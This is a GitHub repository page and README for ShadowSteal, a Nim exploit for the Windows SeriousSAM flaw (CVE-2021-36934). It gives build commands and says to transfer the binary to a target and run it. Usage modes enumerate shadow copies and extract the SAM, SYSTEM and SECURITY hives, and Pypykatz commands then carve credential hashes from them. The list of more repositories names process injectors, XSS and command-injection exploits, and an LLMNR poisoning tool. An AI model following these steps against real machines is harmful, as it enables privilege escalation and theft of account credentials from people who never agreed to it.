• Stars
    star
    194
  • Rank 200,219 (Top 4 %)
  • Language
    Nim
  • License
    BSD 3-Clause "New...
  • Created over 3 years ago
  • Updated over 1 year ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Pure Nim implementation for exploiting CVE-2021-36934, the SeriousSAM local privilege escalation

ShadowSteal | CVE-2021-36934

Pure Nim implementation for exploiting CVE-2021-36934, the SeriousSAM Local Privilege Escalation (LPE). Not OPSEC safe.... yet ;). I do not claim credit for the discovery of this exploit.

Quick Start

Build with Docker

Getting started with ShadowSteal is now easier than ever thanks to Docker! Don't wanna mess with installing Nim dependencies? I got you, fam! Run the Python script to create the Docker build environment, compile the binary, transfer it back to your host, and then kill the container.

Install Docker on your host (look up the documentation for how to install for different OS), then run the ShadowSteal Python script in the main dir:

$ git clone https://github.com/HuskyHacks/ShadowSteal.git && cd ShadowSteal
$ sudo python3 ShadowSteal.py && cd bin/ && ls -l

Build from Source

Or, build from source by installing Nim and its dependencies:

$ sudo apt-get install nim
$ nimble install zippy argparse winim

Install the MinGW tool chain if it's not already installed.

$ sudo apt-get install mingw-w64
$ git clone https://github.com/HuskyHacks/ShadowSteal.git && cd ShadowSteal
$ make && cd bin/ && ls -l

Transfer to target...

PS C:\Users\husky\Desktop> .\ShadowSteal.exe -h

Summary

Due to some oversight by Microsoft, regular users have read permissions over the contents of the ...\System32\config\ folder in recent Windows builds. Among other things, this means that a low level user has read access to the SAM, System, and Security files in ...\System32\config.

1.png

Ooof. So what can we do with this?

Some very observant researchers (shout out @jonasLyk!) noticed that if a Windows host has been using a specific system restore configuration, "Volume Shadow Copies", then the host stores backup copies of these files that are accessible via the Win32 device namespace for these copies.

2.png

3.png

The SAM is normally locked during the host's operation, so accessing the SAM in ...\System32\config\ is out of the question. But these shadow volume copies are fair game for any user on the host due to this misconfiguration. Very nice!

ShadowSteal

ShadowSteal is a binary written in Nim to automate the enumeration and exfiltration of the SAM, System, and Security files from these shadow copies. It iterates through the possible locations of the shadow copies and, when it has found a target, it extracts the files to a zipped directory (think Bloodhound output).

4.png

Features:

  • Triage and Bruteforce mode, for thorough or rapid enumeration.
  • Automated extraction and rollup of target credentials.
  • Jeff Beezy mode. (wait, what?)
  • Integrated Docker build environment for easy complation!
  • Will enumerate all available HarddiskShadowCopy locations, pick the highest number dynamically, and target those for exploitation/extraction.

6.png

It's nothing earth shattering and the code is hacky, but it works and it was a fun build!

Installing from Source

Install Nim:

$ sudo apt-get install nim

Install dependencies:

$ nimble install zippy argparse winim

Install the MinGW tool chain if it's not already installed:

$ sudo apt-get install mingw-w64

Compile for 64-bit Windows:

$ make

Transfer to target and run it!

Usage

PS C:\Users\husky\Desktop> .\ShadowSteal.exe -h
[*] ShadowSteal! Identifies and extracts credentials that can be stolen due to the SeriousSAM (CVE-2021-36934) exploit. Searches from high to low, defaults searching 100 to 1.

Usage:
   [options]

Options:
  -h, --help
  -t, --triage               [*] Triage mode. Quick enumeration, tries to find quick wins.
  -bf, --bruteforce          [*] Bruteforce mode. Enumerates the entire range of possible locations (512 to 1). Takes a bit.
  -b, --bezos                [?] Jeff Bezos Mode

Triage mode

Limits location bruteforce to 10 to 1, decrementing with each attempt. Speedy and effective in most environments.

PS C:\Users\husky\Desktop> .\ShadowSteal.exe -t

Bruteforce mode

Searches all possible locations (512), decrementing down to 1. Try this to thoroughly enumerate the environment. Takes a few minutes.

PS C:\Users\husky\Desktop> .\ShadowSteal.exe -bf

Parsing Output

Transfer the output directory back to your attacker host and carve the data with Pypykatz. To install:

$ pip3 install pypykatz

To run Pypykatz:

$ pypykatz registry [yyyyMMddhhmm_SYSTEM] --sam [yyyyMMddhhmm_SAM] --security [yyyyMMddhhmm_SECURITY]

5.png

Release History

v.04.01 | the Docktastic update

Now features an easy pre-packaged Docker build environment! Just run the ShadowSteal.py script to set up the Docker environment, compile the binay, transfer it back out to your host, and kill the build containers. It just works! (Some assembly requied, i.e. you need Docker to run it).

v.03.69 | the N I C E update

Lean and mean. Optimized compile options added. HUGE performance increase due to compiler optimization, full bruteforce now takes place almost instantly. Huge thanks to @orbitalgun for the pseudo PR, glory be to your house and name!

v.02 THE JEFF BEEZY UPDATE

  • Bruteforce and Triage mode
  • A better search algo
  • Code cleanup
  • Jeff Beezy Mode
  • Lots of lessons learned from the first release!

v.01 THE LAUNCHPAD RELEASE

Stap in boiz, this trainwreck is a-rollin. This release was my rapid prototype and it was pretty terrible lol. Lots of fun to build though! Features:

  • "Working" code

References

Disclaimer

  • For legal, ethical use only.

7.png

More Repositories

1

PMAT-labs

Labs for Practical Malware Analysis & Triage
HCL
532
star
2

RustyProcessInjectors

Just some Rust process injector POCs, nothing weird.
Rust
81
star
3

cve-2022-33891

Apache Spark Shell Command Injection Vulnerability
Python
77
star
4

CobaltNotion

A spin-off research project. Cobalt Strike x Notion collab 2022
51
star
5

the-crown-defcon615

Repo for The Crown: Exploratory Analysis of Nim Malware DEF CON 615 talk
Jupyter Notebook
44
star
6

RustyTokenManipulation

just manipulatin these here tokens yes sir nothing weird
Rust
19
star
7

O-Course

A simple web application vulnerability lab made for the HackerOne Veterans day event
PHP
16
star
8

HuskyHacks

7
star
9

AgentZero

A client-server tool for remote LLMNR/NBTNS poisoning
Python
5
star
10

binary-exploitation-defenses-tsar

Code for An Oral History of Binary Exploitation Defenses
Jupyter Notebook
4
star
11

CVE-2021-38699-Reflected-XSS

Multiple Reflected XSS in TastyIgniter v3.0.7 Restaurtant CMS
3
star
12

CVE-2021-38817-Remote-OS-Command-Injection

Remote OS Command Injection in TastyIgniter v3.0.7 Sendmail Path field
3
star
13

ptx-labs

Lab scripts/POCs for eLS PTX
PowerShell
3
star
14

HuskyHacks.github.io

HTML
3
star
15

dracula-css-notion-super

The Dracula color theme for Notion/Super.so sites. I spent a while on this so I don't want to lose it.
CSS
2
star
16

RustySCShell

i'm going to figure this out if it destroys me
Rust
2
star
17

heyGideon

Scripts for messing with Gideon during CTF/KOTH
Python
1
star
18

CVE-2021-38699-Stored-XSS

Stored XSS in TastyIgniter v3.0.7 Restaurtant CMS
1
star
19

mttaggFerris

Taggart's Intro to Rust Stream
Rust
1
star